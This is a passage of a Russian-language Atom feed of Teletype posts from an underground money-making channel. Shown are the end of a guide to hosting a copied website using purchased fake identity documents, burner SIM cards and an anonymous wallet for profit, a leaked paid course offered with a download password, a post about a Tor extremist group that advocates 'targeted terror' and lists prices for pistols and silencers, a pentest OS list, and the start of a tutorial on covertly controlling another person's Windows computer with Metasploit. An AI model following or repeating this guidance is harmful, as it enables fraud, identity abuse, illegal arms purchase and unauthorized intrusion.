    &lt;img src=&quot;https://tgraph.io/file/fb569e0f5ea6508358aad.png&quot; width=&quot;551&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Жмем &lt;strong&gt;«Enter»&lt;/strong&gt;, и запускается процесс копирования. &lt;strong&gt;После его завершения будет выведено соответствующее сообщение:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/f7054f672dbc081f29dbc.png&quot; width=&quot;370&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Исходники сайта хранятся в папке по пути:&lt;strong&gt; C:\Users\имя_пользователя\kinder-big.ru&lt;/strong&gt;&lt;/p&gt;
  &lt;h3&gt;Регистрация на хостинге и залив сайта&lt;/h3&gt;
  &lt;p&gt;То, с каким хостингом работать — личное дело каждого, но все дальнейшие разъяснения я буду вести на примере &lt;a href=&quot;https://beget.com/&quot; target=&quot;_blank&quot;&gt;https://beget.com/&lt;/a&gt; . В целом, особых отличий нет, так что можешь выбрать любой другой более-менее адекватный.&lt;/p&gt;
  &lt;blockquote&gt;&lt;em&gt;Все действия производятся на подготовленной в предыдущей части системе.&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p&gt;Сперва необходимо пройти регистрацию, для этого нажимаешь в правом верхнем углу кнопку&lt;strong&gt; «Заказать»&lt;/strong&gt;, выбираешь самый дешевый тариф и заполняешь форму. Указывать данные, разумеется, нужно &lt;strong&gt;«левые» &lt;/strong&gt;(комплекты документов продаются на все тех же теневых площадках). Номер вводишь от &lt;strong&gt;«левой» &lt;/strong&gt;СИМ-карты (советую заранее запастись десятком таких), на него придет СМС с кодом подтверждения регистрации.&lt;/p&gt;
  &lt;p&gt;После этого, введешь код из сообщения, тебя перекинет на страницу, где указаны данные для авторизации. Письмо с ними же придет на почту.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/69042c124b83613fd2c92.png&quot; width=&quot;593&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Нажимаем кнопку &lt;strong&gt;«Начать работу»&lt;/strong&gt; и попадаем в панель управления нашим хостингом.&lt;/p&gt;
  &lt;p&gt;Следующим шагом будет регистрация домена (ссылки на сайт, простым языком). Для этого пополняем баланс хостинга через &lt;strong&gt;«левый»&lt;/strong&gt; Qiwi-кошелек:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/657df3e9761fd94ada25b.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В &lt;strong&gt;«Период оплаты:»&lt;/strong&gt; ставим «&lt;strong&gt;Произвольная сумма»&lt;/strong&gt; и вводим в поле ниже &lt;strong&gt;180&lt;/strong&gt;, нажимаем&lt;strong&gt; «Оплатить»&lt;/strong&gt;. На открывшейся странице жмем на &lt;strong&gt;Qiwi&lt;/strong&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/d2e56ed5c2a8e5296377e.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вписываем данные от &lt;strong&gt;«левого» &lt;em&gt;(обожаю это слово&lt;/em&gt;&lt;/strong&gt;&lt;em&gt;)&lt;/em&gt; кошелька и оплачиваем покупку.&lt;/p&gt;
  &lt;p&gt;Теперь, когда деньги поступили на баланс, жмешь &lt;strong&gt;«Домены и поддомены»&lt;/strong&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/d61de357764f086d09646.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Переходишь на вкладку &lt;strong&gt;«Зарегистрировать домен»&lt;/strong&gt;, там нужно будет ввести доменное имя. Проверить, занят тот или иной адрес, можно с помощью сервиса &lt;a href=&quot;http://www.whois-service.ru/&quot; target=&quot;_blank&quot;&gt;http://www.whois-service.ru&lt;/a&gt; :&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/89943ae79d23e2b56bcc5.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Доменную зону следует выбирать соответственно целевой аудитории. То есть, если для буржуев, то &lt;strong&gt;«.com»&lt;/strong&gt;, если для РФ, то&lt;strong&gt; «.ru».&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;После того, как выберешь доменное имя, появится обязательная для заполнения форма:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/3da74cc7c8ad8fa0f3290.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Заполняем ее на купленные &lt;strong&gt;«левые»&lt;/strong&gt; документы.&lt;/p&gt;
  &lt;p&gt;После нажимаем&lt;strong&gt; «Продолжить» &lt;/strong&gt;и отключаем &lt;strong&gt;«Продлевать автоматически»&lt;/strong&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/d5e840b45d995065939da.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Жмем кнопку&lt;strong&gt; «Зарегистрировать»&lt;/strong&gt; и дожидаемся подтверждения (обычно это занимает нескольких часов).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Следующим шагом будет перенос файлов на хостинг и здесь есть 2 пути:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;&lt;em&gt;1) Через встроенный файловый менеджер хостинга.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для этого идем в папку со скопированным сайтом, находящуюся по пути &lt;strong&gt;C:\Users\имя_пользователя\kinder-big.ru&lt;/strong&gt;, выделяем все файлы, щелкаем по ним правой кнопкой мыши и при помощи winrar (или иных архиваторов) формируем zip-архив.&lt;/p&gt;
  &lt;p&gt;Далее следуем на хостинг в пункт &lt;strong&gt;«Файловый менеджер»&lt;/strong&gt;, справа будет папка с именем зарегистрированного ранее домена, переходишь в нее:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/da4d915af55c887af000c.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После открываешь папку &lt;strong&gt;«public_html»&lt;/strong&gt;. В ней будет индексный файл&lt;strong&gt; «index»&lt;/strong&gt;, удаляй его (папку &lt;strong&gt;«sgi-bin»&lt;/strong&gt; не трогай).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;В верхней панельки ждешь на «Загрузить Файлы»:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/ecaf5b0241be89b028e3d.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В открывшемся окне в верхнем левом углу выбираешь &lt;strong&gt;«Browse»&lt;/strong&gt; и отмечаешь сформированный ранее zip-архив. &lt;strong&gt;Нажимаешь «Загрузка» и ждешь, пока файлы прогрузятся на хост:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/5416d59e4744921d306fc.png&quot; width=&quot;482&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Щелкаешь правой кнопкой мыши по загруженному архиву и выбираешь &lt;strong&gt;«Распаковать архив»&lt;/strong&gt;→&lt;strong&gt; «ОК»&lt;/strong&gt;. &lt;strong&gt;Теперь архив можно удалить:&lt;/strong&gt; Правой кнопкой мыши → &lt;strong&gt;«Удалить»&lt;/strong&gt;. По итогу структура файлов будет выглядеть подобным образом:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/21ad89df8e84f7660172f.png&quot; width=&quot;508&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сайт успешно залит на хостинг и при попытке перейти на него по доменному имени, ты увидишь результат.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;&lt;em&gt;2) Загрузка через FTP клиент (предпочтительно).&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Первым делом нужно скачать сам клиент FileZilla &lt;a href=&quot;https://www.filezilla.ru/get/&quot; target=&quot;_blank&quot;&gt;https://www.filezilla.ru/get/&lt;/a&gt; . Сложностей со скачиванием быть не должно, просто выбираешь самую свежую версию под свою ОС.&lt;/p&gt;
  &lt;p&gt;Дальше стандартная процедура установки, можешь не вникать в подробности и просто жать &lt;strong&gt;«ОК».&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Далее нужно будет подключиться к хосту.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/55eb106e4d0005d30105e.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В поле &lt;strong&gt;«Хост:»&lt;/strong&gt; вводишь адрес сервера из технической информации:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/fb4290f5231c1868807e3.png&quot; width=&quot;333&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В &lt;strong&gt;«Имя пользователя:»&lt;/strong&gt; и &lt;strong&gt;«Пароль:»&lt;/strong&gt; - данные, которые приходили на почту при регистрации:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/144b0dc3fd2aded818875.png&quot; width=&quot;562&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После жмешь на &lt;strong&gt;«Быстрое соединение»&lt;/strong&gt;, клиент выполнит подключение и ты получишь возможность загружать файлы без предварительной упаковки в архив.&lt;/p&gt;
  &lt;p&gt;Для этого в левой части окна переходишь в папку с исходниками, а в левой — в папку с именем зарегистрированного домена. &lt;strong&gt;Перемещаешь все исходники из левой части в правую, ждешь, пока выполнится загрузка и можешь проверять результат:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/f436fdabeef2ef796a2e1.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Все готово, теперь реализуй свои знания на практике и зарабатывай бабки, спасибо за прочтение!&lt;/p&gt;
  &lt;blockquote&gt;&lt;em&gt;ДИСКЛЕЙМЕР&lt;/em&gt;&lt;/blockquote&gt;
  &lt;blockquote&gt;&lt;em&gt;Данная статья представлена исключительно в ознакомительных целях и не несет призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.&lt;/em&gt;&lt;/blockquote&gt;

</content></entry><entry><id>hiddencommunity:rbMVepafq</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/rbMVepafq?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Слив курса по заработку в Телеграме</title><published>2020-06-12T08:47:20.199Z</published><updated>2020-06-12T08:47:20.199Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/b0/b2/b0b2ebc2-521c-4674-80e4-3b48226515c1.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/39/aa/39aa2dcb-0946-4eea-b05d-6ecf25b8782c.jpeg&quot;&gt;Привет! Курс обошелся в 6500 рублей и я сливаю его вам. Все крайне просто, если не лениться то можно хорошо озолотится.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/39/aa/39aa2dcb-0946-4eea-b05d-6ecf25b8782c.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Привет! &lt;/strong&gt;Курс обошелся в 6500 рублей и я сливаю его вам. Все крайне просто, если не лениться то можно хорошо озолотится.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Цвет:&lt;/strong&gt; белый или серый (учат обоим видам заработка)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Доходность: &lt;/strong&gt;от 150.000 рублей в месяц (позже вы поймете почему)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Длительность обучения: &lt;/strong&gt;10 дней&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вложения:&lt;/strong&gt; до 2.500 рублей&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Навыки: &lt;/strong&gt;от вас только до 2 часов каждый день на момент обучения, ничего особенного знать не надо&lt;/p&gt;
  &lt;h3&gt;Почему такая доходность?&lt;/h3&gt;
  &lt;p&gt;Да потому, что мы будем работать в доходной нише Telegram&amp;#x27;a. Многие из вас знают, что в Telegram аудитория очень платежеспособная. И нет, это ни создание канала, ни накрутка подписчиков, ни продажа рекламы. Это вообще то, о чем вы даже не могли догадаться.&lt;/p&gt;
  &lt;p&gt;Если бы вы делали эту тему сами, то вам бы пришлось потратить от 30.000 рублей, но курс избавляет вас от этих огромных затрат за более адекватную сумму.&lt;/p&gt;
  &lt;p&gt;Скачать можно &lt;a href=&quot;https://cloud.mail.ru/public/AAYB/R7xn5v7Pp&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt; (pdf - файл)&lt;/p&gt;
  &lt;p&gt;Пароль от архива: infosklad.org&lt;/p&gt;

</content></entry><entry><id>hiddencommunity:6BgKTS90Q</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/6BgKTS90Q?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Русское подполье</title><published>2020-06-11T11:53:35.662Z</published><updated>2020-06-11T11:53:35.662Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/bd/7a/bd7a7363-2a79-4765-b5e6-cbb150f1144e.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/25/e7/25e79420-ada1-4b4b-9b15-108386c6784c.jpeg&quot;&gt;Приветствую вас, будущих Магнатов. Копаясь по просторам Tor'a нашел интересное объединение людей, которые называют себя &quot;Русское Подполье&quot;. Я не мог не рассказать вам об этом, так как это действительно занимательно.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/25/e7/25e79420-ada1-4b4b-9b15-108386c6784c.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Приветствую вас, будущих Магнатов. Копаясь по просторам Tor&amp;#x27;a нашел интересное объединение людей, которые называют себя &amp;quot;Русское Подполье&amp;quot;. Я не мог не рассказать вам об этом, так как это действительно занимательно.&lt;/blockquote&gt;
  &lt;h4&gt;О чём речь?&lt;/h4&gt;
  &lt;p&gt;&amp;quot;Русское Подполье&amp;quot; - объединение русских националистов, главной целью которых является трансформация нынешней России в Русское национальное государство (РНГ).&lt;/p&gt;
  &lt;p&gt;Вот что они пишут о себе на главной странице:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;&amp;quot;Мы позиционируем себя как нелегальное крыло Русского Движения.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Наша текущая цель — трансформация нынешней эРэФии в Русское национальное государство (РНГ).&lt;/p&gt;
  &lt;p&gt;Способ такой трансформации мы видим через подпольную деятельность вооружённых ячеек, через точечный террор конкретных персон (а не всех подряд или кого попало).&amp;quot;&lt;/p&gt;
  &lt;p&gt;На своём форуме они делятся тематической литературой, презирают и обсуждают людей иной расы, общаются, делятся различной информацией. У них так же присутствует своя иерархия, о которой подробно написано на их форуме&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/f945af4ed11d110395fea.jpg&quot; width=&quot;1043&quot; /&gt;
  &lt;/figure&gt;
  &lt;h4&gt;Продажа оружия&lt;/h4&gt;
  &lt;p&gt;Да, да. Эти ребята продают оружие для &amp;quot;своих&amp;quot; ребят. Сами знаете для каких целей. Вот пара товаров:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/eed038e784615414fd9ed.jpg&quot; width=&quot;1400&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/190ad2d10c9e35d639b0b.jpg&quot; width=&quot;1400&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/6d36eab6f1990757bcb1f.jpg&quot; width=&quot;1400&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Цены на оружие довольно-таки демократичные, так как их делают для общего дела&amp;quot;.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Классический ПМ&lt;/strong&gt; - 48 000.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ПМ с резьбой под глушитель&lt;/strong&gt; - 50 000.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Стволик без резьбы&lt;/strong&gt; - 14 000.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Стволик с резьбой 13х1 (левая,правая)&lt;/strong&gt; - 16 000.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Глушитель&lt;/strong&gt; - 25 000.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ПМ с глушителем&lt;/strong&gt; - 73 000.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/48e09f1293b495aa3f0f0.jpg&quot; width=&quot;1043&quot; /&gt;
  &lt;/figure&gt;
  &lt;h4&gt;&lt;strong&gt;Правилами форума запрещены:&lt;/strong&gt;&lt;/h4&gt;
  &lt;ol&gt;
    &lt;li&gt;Любая русофобская риторика&lt;/li&gt;
    &lt;li&gt;Дегенеративный сленг и намеренное пренебрежение правилами русского языка&lt;/li&gt;
    &lt;li&gt;Оскорбления, троллинг, спам, реклама, посты из смайлов, лозунгов, попрошайничество&lt;/li&gt;
    &lt;li&gt;Пустые обещания, угрозы, &amp;#x27;приговоры&amp;#x27;, ничем не подкрепленные манифесты&lt;/li&gt;
    &lt;li&gt;Коммерция вне Торгового раздела&lt;/li&gt;
    &lt;li&gt;Сообщения о кооперации вне ЛС: назначение встреч, действий, поиски соратников&lt;/li&gt;
    &lt;li&gt;Публикация личных данных пользователей или переписки без разрешения модераторов&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;&lt;strong&gt;Вот такие вот ребята обитают на просторах Tor&amp;#x27;а. Не советую присоединяться к подобным объединениям, так как они создают для вас определенные рамки, а они нам не нужны&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote&gt;Данный материал несет ознакомительный характер и не является призывом к действию. За все совершенные противоправные действия вы несёте полную ответственность. Всегда думайте своей головой.&lt;/blockquote&gt;

</content></entry><entry><id>hiddencommunity:E3lsL8ctL</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/E3lsL8ctL?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Топ 10 ОС по анонимности и пентесту</title><published>2020-06-10T13:11:05.429Z</published><updated>2020-06-10T13:11:05.429Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/7a/2b/7a2b8b38-4b0a-4093-a370-aea6d7a38af8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/e7/46/e7465a2e-c2ca-448e-bb78-81caee14206d.jpeg&quot;&gt;Привет всем!</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e7/46/e7465a2e-c2ca-448e-bb78-81caee14206d.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Привет всем!&lt;/p&gt;
  &lt;p&gt;В данной теме я хочу рассказать про топ 10 ОС, которые на мой взгляд пригодны для анонимности и пентеста.&lt;/p&gt;
  &lt;p&gt;Ну что же, приступим!&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;1. Kali Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://www.kali.org/&quot; target=&quot;_blank&quot;&gt;Kali Linux&lt;/a&gt; – самый нашумевший дистрибутив Linux, используемый для этичного хакинга и пентеста. Offensive Security разрабатывали Kali Linux как наследника &lt;a href=&quot;http://www.backtrack-linux.org/&quot; target=&quot;_blank&quot;&gt;BackTrack&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Kali Linux базируется на Debian. Он снабжён многочисленными средствами для пентеста из разнообразных сфер криминалистики и безопасности.&lt;/p&gt;
  &lt;p&gt;Это наиболее продвинутая площадка пентеста. Подходит для кучи девайсов и платформ оборудования. В дополнение Kali Linux порадует вас подробной документацией и огромным активным сообществом.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;2. BackBox&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://backbox.org/&quot; target=&quot;_blank&quot;&gt;BackBox&lt;/a&gt; сделали на базе Ubuntu и спроектировали для пентеста и анализа конфиденциальности и целостности. Входит в топ систем для хакинга.&lt;/p&gt;
  &lt;p&gt;У BackBox есть репозиторий, где вы найдёте свежайшие и надёжные версии всевозможных инструментальных коллекций для системного или сетевого анализа и общепризнанные средства для этичного хакинга. Этот минималистический софт предлагается со свободной рабочей средой XFCE. Таким образом, гарантирует скорость, эффективность, настраиваемость и полную оснастку. За ним также стоит отзывчивое сообщество.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;3. Parrot Security OS&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://www.parrotsec.org/&quot; target=&quot;_blank&quot;&gt;Parrot Security OS&lt;/a&gt; – новенький в команде. &lt;a href=&quot;https://www.frozenbox.org/&quot; target=&quot;_blank&quot;&gt;Frozenbox Network&lt;/a&gt; разрабатывает эту систему. Делали Parrot Security OS для пентестеров, которым важна поддержка облачности, сетевая анонимность и системное шифрование.&lt;/p&gt;
  &lt;p&gt;База Parrot Security OS – также Debian, а рабочая среда – MATE. Здесь увидите чуть ли не все общепризнанные инструментальные средства пентеста, наряду с эксклюзивными программными разработками Frozenbox Network.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;4. BlackArch&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Назначение &lt;a href=&quot;https://blackarch.org/&quot; target=&quot;_blank&quot;&gt;BlackArch&lt;/a&gt; – пентест и анализ безопасности. Разработанный на базе &lt;a href=&quot;https://www.archlinux.org/&quot; target=&quot;_blank&quot;&gt;Arch Linux&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;У платформы личный репозиторий, который содержит тысячи сгруппированных инструментов. Их количество растёт с течением времени.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;5. DEFT Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.deftlinux.net/&quot; target=&quot;_blank&quot;&gt;DEFT&lt;/a&gt;, сокращённо от Digital Evidence &amp;amp; Forensics Toolkit, Linux разрабатывали для компьютерно-технической экспертизы. Помогает запустить действующую систему с проверкой подключённых устройств на повреждение или фальсификацию во время загрузки.&lt;/p&gt;
  &lt;p&gt;DEFT спаренный с DART, платформой для компьютерно-технической экспертизы Windows. В нём увидите среду рабочего стола LXDE и WINE для загрузки средств Windows.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;6. Bugtraq&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://bugtraq-team.com/&quot; target=&quot;_blank&quot;&gt;Bugtraq&lt;/a&gt; похвастается громадной инструментальной коллекцией для хакинга, криминалистики и проведения исследований.&lt;/p&gt;
  &lt;p&gt;Для Bugtraq вы выбираете рабочие среды: GNOME, XFCE или KDE. Основа у него тоже разная: кому-то Debian, а другому Ubuntu либо OpenSUSE. Из 11 языков, на которых он представлен, найдётся подходящий вам.&lt;/p&gt;
  &lt;p&gt;Bugtraq поражает невероятным количеством пентестерских инструментов – мобильная компьютерно-техническая экспертиза, лаборатории для исследования на вредоносные программы, плюс уникальные средства, которые разрабатывает сообщество Bugtraq.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;7. Samurai Web Testing Framework&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://sourceforge.net/projects/samurai/&quot; target=&quot;_blank&quot;&gt;Этот инструмент&lt;/a&gt; разрабатывали для одной задачи – пентеста в сети. Он отличается от других ещё и тем, что представляет собой виртуальную машину при поддержке VMWare и работе с Virtualbox.&lt;/p&gt;
  &lt;p&gt;Программный продукт базируется на Ubuntu. Он вооружит вас первоклассными и бесплатными средствами с открытыми исходниками и ориентацией на тестинг и хакинг веб-сайтов.&lt;/p&gt;
  &lt;p&gt;А бонусом будет преднастроенная Wiki для сохранения данных проводимых пентестов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;8. Pentoo Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Pentoo основывается на Gentoo Linux. Эта платформа прекрасна для пентеста и security-тестинга. Поставляется как LiveCD с хранением данных, а значит, внесённые изменения остаются доступными при очередном запуске, если воспользоваться накопителем с интерфейсом USB.&lt;/p&gt;
  &lt;p&gt;Pentoo – в сущности Gentoo плюс масса конфигурируемых средств, функциональных особенностей ядра и прочего. Применяется свободная XFCE.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;9. Network Security Toolkit&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.networksecuritytoolkit.org/&quot; target=&quot;_blank&quot;&gt;Network Security Toolkit&lt;/a&gt; основывается на Fedora. С ним информационные безопасники и сетевые администраторы получают массу инструментов по ИБ. Исходники этих средств открыты. Загружается со сменного носителя.&lt;/p&gt;
  &lt;p&gt;Платформа славится высокоразвитым веб-интерфейсом. С ней удобно администрировать системы либо сети, автоматизировать, управлять, исследовать и мониторить сети, конфигурировать программы из этого дистрибутива.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;10. Caine&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.caine-live.net/&quot; target=&quot;_blank&quot;&gt;CAINE&lt;/a&gt; расшифровывается как Computer Aided Investigative Environment – среда исследований с автоматизацией. Создавалась в качестве системы компьютерной криминалистики и целиком заточена под это.&lt;/p&gt;
  &lt;p&gt;Caine устанавливается с огромным разнообразием средств исследования системы и компьютерно-технической экспертизы.&lt;/p&gt;
  &lt;p&gt;Ну вот как бы мой топ, опять же это мое личное мнение, поэтому не судите строго!&lt;/p&gt;
  &lt;p&gt;Спасибо всем за внимание!&lt;/p&gt;

</content></entry><entry><id>hiddencommunity:vJtaomYvi</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/vJtaomYvi?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Скрытое управление компьютером на Windows</title><published>2020-06-09T09:40:47.577Z</published><updated>2020-06-09T09:40:47.577Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/c9/5f/c95f3fb6-460e-49d7-8588-46ee79bb7b28.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/99/3b/993b2d19-732b-4b9b-be03-5ffc9535b104.jpeg&quot;&gt;Сегодня мы рассмотрим вопрос скрытого управление компьютером на Windows.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/99/3b/993b2d19-732b-4b9b-be03-5ffc9535b104.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сегодня мы рассмотрим вопрос скрытого управление компьютером на Windows.&lt;/p&gt;
  &lt;blockquote&gt;Данная статья была написана не администрацией настоящего канала и не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях. А также в целях защиты читателей от мошенничества и других противоправных действий. Выполнение данных действий может преследоваться законом.&lt;/blockquote&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/53e16dc24c6ad3067a6a7.jpg&quot; width=&quot;750&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Введение&lt;/h3&gt;
  &lt;p&gt;Указанная задача может быть решена различными способами. В том числе с применением легитимных программ – к примеру, &lt;a href=&quot;https://ru.wikipedia.org/wiki/Virtual_Network_Computing&quot; target=&quot;_blank&quot;&gt;VNC серверами&lt;/a&gt;, &lt;a href=&quot;https://ru.wikipedia.org/wiki/TeamViewer&quot; target=&quot;_blank&quot;&gt;TeamViewer&lt;/a&gt; (если добавить в автозапуск и скрыть отображение иконки в трее), а также специализированного ПО, в том числе коммерческого. Здесь будет показано, как контролировать чужой компьютер используя &lt;a href=&quot;https://kali.tools/?p=1551&quot; target=&quot;_blank&quot;&gt;Metasploit&lt;/a&gt;.&lt;/p&gt;
